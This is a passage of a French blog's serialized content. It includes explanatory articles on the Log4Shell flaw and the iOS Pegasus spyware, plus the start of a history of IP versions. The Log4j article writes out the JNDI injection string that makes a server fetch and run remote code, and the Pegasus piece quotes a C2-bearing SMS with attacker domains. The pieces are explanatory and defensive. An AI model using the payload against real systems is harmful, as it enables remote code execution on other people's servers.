",[75,626,627],{},"Effets persistants, rumeurs de cyanure : Les gaz lacrymo utilisés contre les manifestants inquiètent",". Libération. ",[32,630,631],{"href":631,"rel":632},"https://www.liberation.fr/checknews/2019/05/11/effets-persistants-rumeurs-de-cyanure-les-gaz-lacrymo-utilises-contre-les-manifestants-inquietent_1720285/",[252],[107,634,635,636],{},"Convention on the Prohibition of the Development, Production, Stockpiling and Use of Chemical Weapons and on their Destruction, (1997). ",[32,637,638],{"href":638,"rel":639},"https://www.opcw.org/sites/default/files/documents/CWC/CWC_en.pdf",[252],[107,641,642,643,327,646,649,650],{},"Park, S. (1972). Toxic Effects of Tear Gas on an Infant Following Prolonged Exposure. ",[75,644,645],{},"Archives of Pediatrics & Adolescent Medicine",[75,647,648],{},"123","(3), 245. ",[32,651,652],{"href":652,"rel":653},"https://doi.org/10.1001/archpedi.1972.02110090115018",[252],[107,655,656,657,327,660,663,664],{},"Park, S.-H., Chung, E.-K., Yi, G.-Y., Chung, K.-J., Shin, J.-A., & Lee, I.-S. (2010). A Study for Health Hazard Evaluation of Methylene Chloride Evaporated from the Tear Gas Mixture. ",[75,658,659],{},"Safety and Health at Work",[75,661,662],{},"1","(1), 98‑101. ",[32,665,666],{"href":666,"rel":667},"https://doi.org/10.5491/SHAW.2010.1.1.98",[252],[107,669,670,673,674],{},[75,671,672],{},"Potassium chloride production—Ranking, 2022—Knoema.com",". (s. d.). Knoema. Consulté 9 juillet 2023, à l’adresse ",[32,675,678],{"href":676,"rel":677},"https://knoema.fr//atlas/topics/Agriculture/Engrais-Quantit%C3%A9-de-production-en-nutriants/Potassium-chloride-production",[252],"https://knoema.fr//atlas/topics/Agriculture/Engrais-Quantité-de-production-en-nutriants/Potassium-chloride-production",[107,680,681,684,685],{},[75,682,683],{},"Potassium nitrate | OEC",". (s. d.). OEC - The Observatory of Economic Complexity. Consulté 5 juillet 2023, à l’adresse ",[32,686,687],{"href":687,"rel":688},"https://oec.world/en/profile/hs/potassium-nitrate",[252],[107,690,691,692,316,695],{},"Samuel, A., & Picot, A. (2020). ",[75,693,694],{},"L’utilisation du gaz lacrymogène CS, ses effets sur la santé à plus ou moins long terme",[32,696,697],{"href":697,"rel":698},"https://www.atctoxicologie.fr/images/Gaz_lacrymo_CS_DossierV7.pdf",[252],[107,700,701,702,316,704],{},"Santa María School massacre. (2023). In ",[75,703,569],{},[32,705,706],{"href":706,"rel":707},"https://en.wikipedia.org/w/index.php?title=Santa_Mar%C3%ADa_School_massacre&oldid=1145971383",[252],[107,709,710,711,327,714,717,718],{},"Torgrimson-Ojerio, B. N., Mularski, K. S., Peyton, M. R., Keast, E. M., Hassan, A., & Ivlev, I. (2021). Health issues and healthcare utilization among adults who reported exposure to tear gas during 2020 Portland (OR) protests. ",[75,712,713],{},"BMC Public Health",[75,715,716],{},"21",", 803. ",[32,719,720],{"href":720,"rel":721},"https://doi.org/10.1186/s12889-021-10859-w",[252],[107,723,724,727,728],{},[75,725,726],{},"Toulouse. Des tonnes d’explosif enfouis sous l’eau : Jean Castex s’empare du dossier",". (2020, novembre 27). actu.fr. ",[32,729,730],{"href":730,"rel":731},"https://actu.fr/occitanie/toulouse_31555/toulouse-des-tonnes-d-explosif-enfouis-sous-l-eau-jean-castex-s-empare-du-dossier_37739214.html",[252],[107,733,734,735,327,738,740,741],{},"Tuttle, C. (2006). History Repeats Itself : Child Labor in Latin America. ",[75,736,737],{},"Employee Responsibilities and Rights Journal",[75,739,415],{},"(2), 143‑154. ",[32,742,743],{"href":743,"rel":744},"https://doi.org/10.1007/s10672-006-9012-0",[252],[107,746,747,748,316,751],{},"Venkatakrishna-Bhatt, H. (2012). ",[75,749,750],{},"Impairment of testis in rats after exposure to orthochlorobenzylidene malononitrile (CS) : An experimental study",[32,752,753],{"href":753,"rel":754},"https://www.semanticscholar.org/paper/Impairment-of-testis-in-rats-after-exposure-to-An-Venkatakrishna-Bhatt/258a7cd8330ea0ba8c5480e9453c5ee8fd7f406f",[252],[107,756,757,758,327,761,763,764],{},"Zekri, A. M. B., King, W. W. K., Yeung, R., & Taylor, W. R. J. (1995). Acute mass burns caused by o-chlorobenzylidene malononitrile (CS) tear gas. ",[75,759,760],{},"Burns",[75,762,716],{},"(8), 586‑589. ",[32,765,766],{"href":766,"rel":767},"https://doi.org/10.1016/0305-4179(95)00063-H",[252],{"title":53,"searchDepth":54,"depth":54,"links":769},[],"L'odeur, les cris, la peur, le bruit, les pleurs… Chaque sens me rappelle ces sons d'explosions, la vue de la cohue, cette angoisse qui vous terrasse. Ceci est le récit traumatique de nombre de nos camarades que nous avons pu recueillir. Plus que jamais en France, l’État a fait une utilisation démesurée des gaz dits lacrymogènes, empoisonnant et traumatisant sciemment la population.",{"author":23,"category":772,"date":773,"highlighted":774,"published":774,"slug":775,"initialPublisher":776,"initialLink":777,"icon":778,"cover":779,"coverDescription":780},"politics","June 2, 2024","Yes","lacrymo","le Mouvement National Lycéen","https://mnl-syndicat.fr/lacrymo","ph:bomb-bold","https://uploads5.wikiart.org/images/magdalena-carmen-frieda-kahlo-y-calder%C3%B3n-de-rivera/weeping-coconuts-or-coconut-tears-1951.jpg","Weeping Coconuts or Coconut Tears - Frida Kahlo","/articles/lacrymo",{"title":69,"description":770},"articles/lacrymo","siT-uW95XIYxq8X9ZGHNrqaE6yYRUv-ncEXZKZW5X2M",{"id":786,"title":787,"body":788,"description":939,"extension":59,"meta":940,"navigation":61,"path":949,"seo":950,"stem":951,"__hash__":952},"articles/articles/log4j2.md","Log4j, une vulnérabilité d'une ampleur inédite",{"type":7,"value":789,"toc":935},[790,799,811,817,821,828,841,859,866,869,875,879,882,885,903,914,926],[14,791,792,793,798],{},"Le 9 décembre 2021, la publication d'une vulnérabilité 0 day baptisée Log4Shell (",[32,794,797],{"href":795,"rel":796},"https://nvd.nist.gov/vuln/detail/CVE-2021-44228",[252],"CVE-2021-44228",") a ébranlé le monde de la sécurité informatique, nous tacherons de comprendre son fonctionnement et comment s'en prémunir dans cet article.",[14,800,801,806,807,810],{},[32,802,805],{"href":803,"rel":804},"https://github.com/apache/logging-log4j2",[252],"Log4j2"," est une bibliothèque Java de journalisation. Cette bibliothèque est extrêmement utilisée par de nombreuses entreprises, comme, pour ne citer qu'elles, Apple, Steam, Twitter, Amazon, Tesla ou encore Microsoft. Le problème est qu'une vulnérabilité a été découverte sur ce logiciel. Cette vulnérabilité était passée jusqu'alors inaperçue, le 9 décembre un utilisateur de Github, ",[120,808,809],{},"wcc526",", interroge l'auteur d'une pull request corrigeant cette faille à propos de celle ci. S'ensuit la publication d'une CVE et d'un Proof Of Concept.",[14,812,813],{},[93,814],{"alt":815,"src":816},"github.webp","log4j2/github.webp",[38,818,820],{"id":819},"exploitation","Exploitation",[14,822,823,824,827],{},"L'exploitation de cette vulnérabilité est triviale, une simple suite de caractères comme ",[120,825,826],{},"${jndi:ldap://example.com/a}"," permet d'obtenir une RCE (Remote Code Execution) sur le serveur distant.",[14,829,830,831,836,837,840],{},"JNDI est l'acronyme de \"Java Naming and Directory Interface\", c'est une fonction de Java qui permet d'interroger des directories afin d'obtenir en retour un objet java. Un directory, c'est une sorte de base de donnée principalement utilisée en entreprise qui stocke des informations comme par exemple les utilisateurs, leurs droits, etc. On peut citer ActiveDirectory ou encore ",[32,832,835],{"href":833,"rel":834},"https://fr.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol",[252],"LDAP"," comme exemple de directory bien connu. Java, à travers JNDI, supporte le directory bien connu LDAP. La syntaxe ",[120,838,839],{},"jndi:ldap://example.com/a"," interroge le serveur LDAP sur le serveur example.com et va télécharger l'objet a.",[14,842,843,844,847,848,851,852,854,855,858],{},"La syntaxe ",[120,845,846],{},"${}","indique à Log4j qu'il faut évaluer ce qui est indiqué entre accolades. Par exemple, ",[120,849,850],{},"${java:version}"," renverra la version de java. Ici, ",[120,853,826],{}," indique à Log4j d'évaluer (exécuter) l'objet présent à l'URI ",[120,856,857],{},"ldap://example.com/a",".",[14,860,861,862,865],{},"Au vu de ces éléments, il est trivial d'obtenir une RCE sur le serveur distant. Il suffit de monter un serveur LDAP malicieux contenant un objet Java vérolé et de faire en sorte que ",[120,863,864],{},"${jndi:ldap://SERVEUR/OBJET}"," soit loggé.",[14,867,868],{},"Cette vulnérabilité est très inquiétante au vu de la facilité avec laquelle elle peut être exploitée. À la découverte de cette dernière, de nombreux bots ont scanné l'ensemble d'Internet à la recherche de serveurs vulnérables. Des serveurs de toutes tailles ont été ciblés, y compris des sites web modestes.",[14,870,871],{},[93,872],{"alt":873,"src":874},"vm01.webp","log4j2/vm01.webp",[38,876,878],{"id":877},"limiter-les-dégâts","Limiter les dégâts",[14,880,881],{},"Il existe plusieurs méthodes afin de mitiger cette faille de sécurité.",[14,883,884],{},"La première, la plus évidente, mettre à jour log4j vers la version 2.17.0 et/ou Java vers la version 8u121 (sortie début 2017). Les versions 2.15 et 2.16 sont respectivement vulnérables à une RCE et une attaque DoS. Ces versions ne sont donc pas à considérer comme sécurisées.",[14,886,887,888,891,892,895,896,899,900,858],{},"La seconde, mettre la variable ",[120,889,890],{},"log4j2.formatMsgNoLookups"," à ",[120,893,894],{},"True",", ceci peut être fait en ajoutant l'argument ",[120,897,898],{},"‐Dlog4j2.formatMsgNoLookups=True"," à la commande permettant de lancer l'application Java. Ceci peut aussi être fait en ajoutant la variable d'environnement Linux ",[120,901,902],{},"LOG4J_FORMAT_MSG_NO_LOOKUPS",[14,904,905,906,909,910,913],{},"La troisième, plus radicale, consiste à enlever purement et simplement la classe ",[120,907,908],{},"JndiLookup"," qui est la cause de cette vulnérabilité. Ceci peut être fait avec la commande ",[120,911,912],{},"zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class"," notamment.",[14,915,916,917,920,921,858],{},"Une autre solution, plus atypique, a été mise en place par Maayan-Sela et cr-mitmit, elle s'appelle ",[120,918,919],{},"Logout4Shell",", c'est un logiciel en Java qui permet de patcher n'importe quel serveur vulnérable. Le code est disponible ",[32,922,925],{"href":923,"rel":924},"https://github.com/Cybereason/Logout4Shell",[252],"ici",[14,927,928,929,934],{},"Une autre solution, préventive cette fois, qui aurait pu limiter grandement les dégâts, est de bien cloisonner ses différents services. Ceci peut être fait au moyen de ",[32,930,933],{"href":931,"rel":932},"https://ilearned.eu/systemd-sandboxing.html",[252],"services systemd renforcés",", ou de technologies de conteneurisation comme Docker.",{"title":53,"searchDepth":54,"depth":54,"links":936},[937,938],{"id":819,"depth":54,"text":820},{"id":877,"depth":54,"text":878},"Le 9 décembre 2021, la publication d'une vulnérabilité 0 day baptisée Log4Shell (CVE-2021-44228) a ébranlé le petit monde de la sécurité informatique, nous tacherons de comprendre son fonctionnement et comment s'en prémunir dans cet article. Log4j2 est une bibliothèque Java de journalisation. Cette bibliothèque est extrêmement utilisée par de nombreuses entreprises, comme, pour ne citer qu'elles, Apple, Steam, Twitter, Amazon, Tesla ou encore Microsoft. Le problème est qu'une vulnérabilité a été découverte sur ce logiciel. Cette vulnérabilité était passée jusqu'alors inaperçue, le 9 décembre un utilisateur de Github, wcc526, interroge l'auteur d'une pull request corrigeant cette faille à propos de celle ci. S'ensuit la publication d'une CVE et d'un Proof Of Concept.",{"author":23,"category":941,"date":942,"highlighted":774,"published":774,"slug":943,"initialPublisher":944,"initialLink":945,"icon":946,"cover":947,"coverDescription":948},"informatics","December 11, 2021","log4j2","I Learned","https://blog.ilearned.eu/log4j.html","ph:bug-bold","https://uploads0.wikiart.org/images/frantisek-kupka/fanny-machine-the-machinery-1928.jpg","The machinery, 1928 - František Kupka","/articles/log4j2",{"title":787,"description":939},"articles/log4j2","w4C6JcYB1voCZCwpugKOu3cneKEvB_YedSqAUPTpYmg",{"id":954,"title":955,"body":956,"description":1297,"extension":59,"meta":1298,"navigation":61,"path":1305,"seo":1306,"stem":1307,"__hash__":1308},"articles/articles/pegasus.md","Pegasus, à la croisée du technique et du politique",{"type":7,"value":957,"toc":1295},[958,985,989,998,1004,1006,1018,1043,1046,1049,1078,1084,1091,1097,1099,1108,1114,1122,1133,1140,1146,1148,1152,1171,1174,1177,1245,1248,1269,1272,1276,1291],[14,959,960,961,966,967,972,973,978,979,984],{},"Le 18 juillet 2021 à 19h, ",[32,962,965],{"href":963,"rel":964},"https://www.amnesty.org/en/",[252],"Amnesty International"," révèle dans une enquête en collaboration avec ",[32,968,971],{"href":969,"rel":970},"https://forbiddenstories.org/",[252],"Forbidden Stories"," que le logiciel Pegasus, édité par la société israélienne ",[32,974,977],{"href":975,"rel":976},"https://www.nsogroup.com/",[252],"NSO Group",", a été utilisé à des fins d'espionnage contre des militants politiques, des journalistes, des membres d'ONG, etc. On apprendra quelques jours plus tard que l'État marocain a acheté à NSO sa solution d'espionnage afin de placer sur écoute de nombreux ministres français, mais aussi Edwy Plenel, Eric Zemmour ou encore Emmanuel Macron. Ce logiciel avait déjà été mis sous le feu des projecteurs en 2016 par ",[32,980,983],{"href":981,"rel":982},"https://citizenlab.ca/",[252],"Citizen Lab"," pour dénoncer le même genre de pratiques. Nous analyserons dans cet article l'aspect technique du spyware Pegasus dans sa version pour iOS.",[80,986,988],{"id":987},"premières-révélations-2016-trident","Premières révélations, 2016 − Trident",[14,990,991,992,997],{},"En 2016, la société Lookout publie ",[32,993,996],{"href":994,"rel":995},"https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf",[252],"un whitepaper"," détaillant le fonctionnement technique de Pegasus sur iOS. Le mode opératoire de ce spyware est relativement simple, un message contenant un lien est envoyé à la cible, lorsque la cible clique sur le lien une faille 0day est exploitée sur le téléphone de la victime, et le spyware s'installe.",[14,999,1000],{},[93,1001],{"alt":1002,"src":1003},"Schéma montrant une infection par un lien vérolé.","pegasus/Infection_via_clic_sms.png",[14,1005,1002],{},[14,1007,1008,1009,1013,1014,1017],{},"Afin d'infecter le téléphone de la victime, le malware Pegasus utilise trois vulnérabilités différentes, la première est la ",[32,1010,1012],{"href":1011},"www.phrack.org/papers/attacking_javascript_engines.html","CVE-2016-4657",". − Une CVE une faille de sécurité rendue publique, c'est l'acronyme de Common Vulnerabilities and Exposures. − Cette CVE consiste en une vulnérabilité dans la façon qu'a Webkit, le moteur rendu de page web utilisé par iOS, d'interpréter le JavaScript, et plus particulièrement dans la fonction ",[120,1015,1016],{},"arrayProtoFuncSlice"," qui permet simplement de couper un array à un endroit précis.",[113,1019,1023],{"className":1020,"code":1021,"language":1022,"meta":53,"style":53},"language-diff shiki shiki-themes material-theme-lighter material-theme material-theme-palenight","var a = [1, 2, 3, 4];\nvar s = a.slice(1, 3);\n// s = [2, 3]\n","diff",[120,1024,1025,1032,1037],{"__ignoreMap":53},[519,1026,1029],{"class":1027,"line":1028},"line",1,[519,1030,1031],{},"var a = [1, 2, 3, 4];\n",[519,1033,1034],{"class":1027,"line":54},[519,1035,1036],{},"var s = a.slice(1, 3);\n",[519,1038,1040],{"class":1027,"line":1039},3,[519,1041,1042],{},"// s = [2, 3]\n",[14,1044,1045],{},"Grâce à cette vulnérabilité que nous ne verrons pas en détail ici étant donné la complexité de son fonctionnement, un code JavaScript malveillant peut écrire à des endroits dans la mémoire auxquels il ne devrait pas avoir accès, ainsi un attaquant peut exécuter du code directement sur le système depuis une page web.",[14,1047,1048],{},"Une fois cette faille exploitée, Pegasus en utilise une seconde, la CVE-2016-4655.",[14,1050,1051,1052,1055,1056,1061,1062,1067,1068,1071,1072,1077],{},"Pour appréhender cette vulnérabilité, il est nécessaire de comprendre ce qu'est le ",[120,1053,1054],{},"Kernel ASLR",". Lorsque l'on cherche à attaquer un système et plus spécifiquement lorsque l'on cherche à pivoter du ",[32,1057,1060],{"href":1058,"rel":1059},"https://beta.hackndo.com/le-monde-du-kernel/",[252],"kernel land vers le userland",", il peut être intéressant de connaitre la position (l'adresse) du ",[32,1063,1066],{"href":1064,"rel":1065},"https://fr.wikipedia.org/wiki/Noyau_de_syst%C3%A8me_d%27exploitation",[252],"Kernel"," dans la RAM, si cette adresse était statique il serait trivial de l'obtenir. Pour éviter cela, il existe une fonction appelée KASLR (Kernel Address Space Layout Randomization, littéralement randomisation de l'espace d'adressage du noyau). Avec KASLR, à chaque redémarrage de l'appareil, l'adresse du kernel est décalée d'une valeur aléatoire, appelée ",[120,1069,1070],{},"kernel slide",", générée par le ",[32,1073,1076],{"href":1074,"rel":1075},"https://en.wikipedia.org/wiki/Bootloader",[252],"bootloader",". Cette fonctionnalité n'est pas spécifique à iOS, elle est aussi présente sous Linux, BSD (donc MacOS) et Windows.",[14,1079,1080,1081,1083],{},"La CVE-2016-4655 permet donc à un attaquant de calculer ce ",[120,1082,1070],{}," et donc la position du Kernel en RAM, ce qui sera utile pour exploiter la dernière CVE de notre triptyque, la CVE-2016-4656.",[14,1085,1086,1087,1090],{},"Cette CVE est une vulnérabilité de type ",[120,1088,1089],{},"Use-After-Free",", elle permet à un attaquant d'injecter du code malveillant dans un endroit de la mémoire libéré, mais dont l'adresse serait encore présente dans le code. Le programme exécutera donc le code présent à cette adresse, dans ce cas ci avec des droits d'administrateur. Une fois ces privilèges acquis, Pegasus peut donc s'installer avec des privilèges d'administrateur et ainsi pouvoir espionner les conversations de l'utilisateur.",[14,1092,1093],{},[93,1094],{"alt":1095,"src":1096},"Schema montrant le principe d'une vulnérabilité UFA","pegasus/Use_after_free(1).png",[14,1098,1095],{},[14,1100,1101,1102,1107],{},"Afin de rester le plus discret possible, l'adresse du C2 (",[32,1103,1106],{"href":1104,"rel":1105},"https://whatis.techtarget.com/fr/definition/Commande-et-controle",[252],"Command & Control",", le serveur central chargé d'envoyer des commandes au téléphone et de recevoir les informations) est dissimulée dans un SMS apparemment anodin d'authentification d'un compte Google.",[14,1109,1110],{},[93,1111],{"alt":1112,"src":1113},"Your Google Verification code is:5678429\nhttp://gmail.com/?z=G&i=1:aalaan.tv:443,1:manoraonlinu.nut:443&s=Λ�=&�","pegasus/SMS_C2.png",[14,1115,1116,1117],{},"Your Google Verification code is:5678429\n",[32,1118,1121],{"href":1119,"rel":1120},"http://gmail.com/?z=G&i=1:aalaan.tv:443,1:manoraonlinu.nut:443&s=%CE%9B%EF%BF%BD=&%EF%BF%BD",[252],"http://gmail.com/?z=G&i=1:aalaan.tv:443,1:manoraonlinu.nut:443&s=Λ�=&�",[14,1123,1124,1125,1128,1129,1132],{},"On peut voir que dans le paramètre ",[120,1126,1127],{},"i",", l'adresse du C2 est cachée. D'après les analyses de Lookout, le dernier chiffre du code de vérification correspondrait au \"numéro d'instruction\", ici ",[120,1130,1131],{},"9",". Ainsi, même en l'absence d'accès à internet, il est possible pour NSO Group d’interagir avec un téléphone infecté.",[14,1134,1135,1136,1139],{},"Pegasus s'appuie donc sur trois failles 0 day distinctes. Cela illustre le niveau de sophistication du logiciel. L'utilisation de trois failles ",[120,1137,1138],{},"0day"," montre aussi que les moyens financiers mis en place pour créer Pegasus sont importants.",[14,1141,1142],{},[93,1143],{"alt":1144,"src":1145},"La CVE-2016-4657 permet d'obtenir une RCE, puis la CVE-2016-4655 permet de trouver le kernel slide. Enfin, la CVE-2016-4656 permet de jailbreak l'appareil et d'installer Pegasus","pegasus/Infection_Pegasus(1).png",[14,1147,1144],{},[80,1149,1151],{"id":1150},"une-affaire-dampleur-2021-megalodon","Une affaire d'ampleur, 2021 − Megalodon",[14,1153,1154,1155,1160,1161,1164,1165,1170],{},"Le 18 juin 2021, la cellule d'investigation d'Amnesty International révélait donc dans un ",[32,1156,1159],{"href":1157,"rel":1158},"https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/",[252],"whitepaper"," le nouveau mode opératoire de Pegasus, et en particulier l'existence de l'exploitation de failles dites ",[120,1162,1163],{},"0click",". Cette vulnérabilité permet à un attaquant, par un simple iMessage, d'infecter un téléphone. Amnesty a pu récupérer depuis des sauvegardes iCloud un certain nombre d'",[32,1166,1169],{"href":1167,"rel":1168},"https://github.com/AmnestyTech/investigations/blob/master/2021-07-18_nso/emails.txt",[252],"adresses mail"," correspondant aux comptes iCloud utilisés pour infecter les téléphones cibles.",[14,1172,1173],{},"Pour se camoufler, Pegasus utilise pour le nom de ses processus des noms très similaires à ceux utilisés par iOS.",[14,1175,1176],{},"En voici quelques exemples :",[1178,1179,1180,1193],"table",{},[1181,1182,1183],"thead",{},[1184,1185,1186,1190],"tr",{},[1187,1188,1189],"th",{},"Nom de processus utilisé par Pegasus",[1187,1191,1192],{},"Nom de processus original",[1194,1195,1196,1205,1213,1221,1229,1237],"tbody",{},[1184,1197,1198,1202],{},[1199,1200,1201],"td",{},"ABSCarryLog",[1199,1203,1204],{},"ASPCarryLog",[1184,1206,1207,1210],{},[1199,1208,1209],{},"aggregatenotd",[1199,1211,1212],{},"aggregated",[1184,1214,1215,1218],{},[1199,1216,1217],{},"ckkeyrollfd",[1199,1219,1220],{},"ckkeyrolld",[1184,1222,1223,1226],{},[1199,1224,1225],{},"com.apple.Mappit.SnapshotService",[1199,1227,1228],{},"com.apple.MapKit.SnapshotService",[1184,1230,1231,1234],{},[1199,1232,1233],{},"com.apple.rapports.events",[1199,1235,1236],{},"com.apple.rapport.events",[1184,1238,1239,1242],{},[1199,1240,1241],{},"CommsCenterRootHelper",[1199,1243,1244],{},"CommCenterRootHelper",[14,1246,1247],{},"Le Security Lab d'Amnesty a aussi pu détecter que des applications comme Apple Music ont été utilisées comme des vecteurs d'attaque.",[14,1249,1250,1251,1256,1257,1262,1263,1268],{},"vx-underground a publiqué ",[32,1252,1255],{"href":1253,"rel":1254},"https://twitter.com/vxunderground/status/1418207502974525441?s=20",[252],"des fichiers"," qui, selon leurs dires, seraient la version pour Android de Pegasus, cependant, la société ",[32,1258,1261],{"href":1259,"rel":1260},"https://www.zecops.com/",[252],"ZecOps"," a pu analyser ces fichiers qui, ",[32,1264,1267],{"href":1265,"rel":1266},"https://twitter.com/ZecOps/status/1418954109768531968?s=20",[252],"selon eux",", n'appartiendraient pas à Pegasus.",[14,1270,1271],{},"L'ensemble de ces nouvelles techniques reste relativement flou, en effet, Amnesty International n'a pas pu récupérer le binaire de Pegasus pour l'analyser, celui-ci étant chiffré. Sans cette rétro-ingénierie, aucune CVE n'a pu être publiée.",[80,1273,1275],{"id":1274},"au-delà-de-la-technique","Au-delà de la technique",[14,1277,1278,1279,1284,1285,1290],{},"Au-delà de l'aspect technique, cette affaire est avant tout politique. Elle montre qu'à l'ère d'un monde interconnecté, il est possible pour les services de renseignement d'États anti-démocratiques − comme celui du Maroc qui, ",[32,1280,1283],{"href":1281,"rel":1282},"https://www.lemonde.fr/projet-pegasus/article/2021/07/22/projet-pegasus-emmanuel-macron-convoque-un-conseil-de-defense-exceptionnel_6089148_6088648.html",[252],"d'après Amnesty International"," aurait acheté sa solution à NSO Group − d'espionner des cibles très diverses à l'autre bout de la planète. L'affaire Pegasus montre enfin que, malgré l'avis général de la population ",[32,1286,1289],{"href":1287,"rel":1288},"https://www.amnesty.org/fr/latest/news/2015/03/global-opposition-to-usa-big-brother-mass-surveillance/",[252],"contre"," la surveillance des communications électroniques, les gouvernements des différents pays continuent d'opérer ces pratiques dans le plus grand secret. Cette distance entre l'avis de la majorité de la population et les décisions prises par nos gouvernements illustre les limites de nos systèmes politiques.",[1292,1293,1294],"style",{},"html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":53,"searchDepth":54,"depth":54,"links":1296},[],"Le 18 juillet 2021 à 19h, Amnesty International révèle dans une enquête en collaboration avec Forbidden Stories que le logiciel Pegasus, édité par la société israélienne NSO Group, a été utilisé à des fins d'espionnage contre des militants politiques, des journalistes, des membres d'ONG, etc. Nous analyserons dans cet article l'aspect technique du spyware Pegasus dans sa version pour iOS.",{"author":23,"category":941,"date":1299,"highlighted":774,"published":774,"slug":1300,"initialPublisher":944,"initialLink":1301,"icon":1302,"cover":1303,"coverDescription":1304},"August 11, 2021","pegasus","https://blog.ilearned.eu/pegasus.html","ph:horse-bold","https://uploads0.wikiart.org/images/odilon-redon/the-black-pegasus.jpg","The Black Pegasus, 1910 - Odilon Redon","/articles/pegasus",{"title":955,"description":1297},"articles/pegasus","Uvk4kv6K5QM5d0JgHfzUf88iEtVTFyLAAxM2dSQSelY",{"id":1310,"title":1311,"body":1312,"description":1462,"extension":59,"meta":1463,"navigation":61,"path":1470,"seo":1471,"stem":1472,"__hash__":1473},"articles/articles/versions-ip.md","Les version oubliées du protocole IP",{"type":7,"value":1313,"toc":1459},[1314,1317,1321,1330,1333,1339,1346,1349,1358,1363,1369,1374,1383,1387,1396,1400,1413,1450],[14,1315,1316],{},"On connaît tous IPv4 et IPv6 qui sont deux protocoles largement répandus, bien que l'adoption d'IPv6 reste incomplète. On pourrait toutefois se demander s'il existe d'autres versions du protocole Internet, nous ferons donc dans cet article un petit tour d'horizon des différentes itérations du protocole IP et de leurs spécificités.",[38,1318,1320],{"id":1319},"ipv1-2-et-3-la-genèse-du-protocole-internet","IPv1 2 et 3 − La genèse du protocole Internet",[14,1322,1323,1324,1329],{},"Le premier document décrivant le fonctionnement d'IP est la ",[32,1325,1328],{"href":1326,"rel":1327},"https://www.rfc-editor.org/rfc/rfc675.html",[252],"RFC 675"," publiée en 1974 mais présentée dès 1973 à l'International Network Working Group. Si vous parcourez cette RFC vous remarquerez qu'elle ne fait pas mention du protocole IP, mais de TCP, en effet à l'époque, TCP et IP n'étaient pas séparés et le principe de couches apporté notamment par le modèle TCP/IP, sortit en 1976, n'était pas encore d'actualité. Parler d'IPv1 est donc un abus de langage, le terme adapté serait plutôt TCP version 1.",[14,1331,1332],{},"Ce protocole avait une particularité intéressante, il contenait quatre champs adresse dans son header, contre deux pour IPv6. Un pour le réseau de destination (et d'origine), rappelez vous, nous sommes en 1974 et à cette époque le réseau Internet comme nous le connaissons aujourd'hui n'existe pas, il existe donc différents réseaux concurrent, ce champ dans l'en-tête a pour but de spécifier sur quel réseau le paquet doit transiter. Ainsi, vous pouvez voir ci-dessous les différentes valeurs possibles pour ce champ et donc les principaux réseaux qui cohabitent à cette époque.",[113,1334,1337],{"className":1335,"code":1336,"language":118},[116],"1010 = ARPANET\n1011 = UCL\n1100 = CYCLADES\n1101 = NPL\n1110 = CADC\n1111 = EPSS\n",[120,1338,1336],{"__ignoreMap":53},[14,1340,1341,1342,1345],{},"Les troisième et quatrième champs sont destinés à accueillir les ",[120,1343,1344],{},"adresses TCP"," d'origine et de destination, ces adresses ne sont pas très détaillées dans la RFC, mais on sait qu'elles sont d'une longueur de 16 bits (65 536 adresses différentes), elles correspondent peu ou prou à ce qu'on appelle aujourd'hui \"adresses IP\".",[14,1347,1348],{},"Cette première version de TCP est vraiment expérimentale, elle n'a pas été déployée à grande échelle comme l'ont été IPv4 et IPv6",[14,1350,1351,1352,1357],{},"Vient ensuite en 1977 la deuxième version de TCP (et donc par extension du protocole internet), cette version, publiée dans l'",[32,1353,1356],{"href":1354,"rel":1355},"https://www.rfc-editor.org/in-notes/ien/ien5.pdf",[252],"IEN 5",", apporte certaines améliorations dont notamment le passage à un \"Network Identifier\", ce qui était auparavant appelé réseau de destination/origine, codé sur 8 bits.",[14,1359,1360],{},[93,1361],{"alt":53,"src":1362},"versions-ip/Capture_dcran_du_2021-07-04_17-41-26.png",[14,1364,1365,1366,1368],{},"Autre différence, les \"host identifier\", anciennement appelés ",[120,1367,1344],{},", sont maintenant codés sur 24 bits, soit un total de 16 777 216 adresses. On peut aussi voir le début de la séparation entre TCP et IP dans ce schéma d'époque avec les parties \"TCP Header\" et \"Internet Header\".",[14,1370,1371],{},[93,1372],{"alt":53,"src":1373},"versions-ip/Capture_dcran_du_2021-07-04_17-47-49.png",[14,1375,1376,1377,1382],{},"Séparation qui sera ",[32,1378,1381],{"href":1379,"rel":1380},"https://datatracker.ietf.org/doc/html/rfc760",[252],"actée"," dans la version 3 de TCP, publiée en 1978, ce qui représente une avancée majeure dans l'évolution du protocole internet.",[80,1384,1386],{"id":1385},"ipv5","IPv5",[14,1388,1389,1390,1395],{},"IPv5 n'a pas réellement existé, il s'agit en fait du ",[32,1391,1394],{"href":1392,"rel":1393},"https://datatracker.ietf.org/doc/html/rfc1190",[252],"Stream Protocol",", abrégé ST-II, un protocole de couche 3 (comme IP), créé pour faciliter l'envoi de vidéo et d'audio par internet et qui avait dans le champ version la valeur 5. C'était donc une version modifiée d'IPv4 mais qui avait des adresses codées sur 32 bits, comme pour IPv4, qui ne répondait donc pas à la problématique principale posée par IPv4, le manque d'adresses. Ce protocole marque le début de VoIP (Voice over IP) mais il ne sera pas déployé à grande échelle, VoIP sera ensuite simplement déployé sur 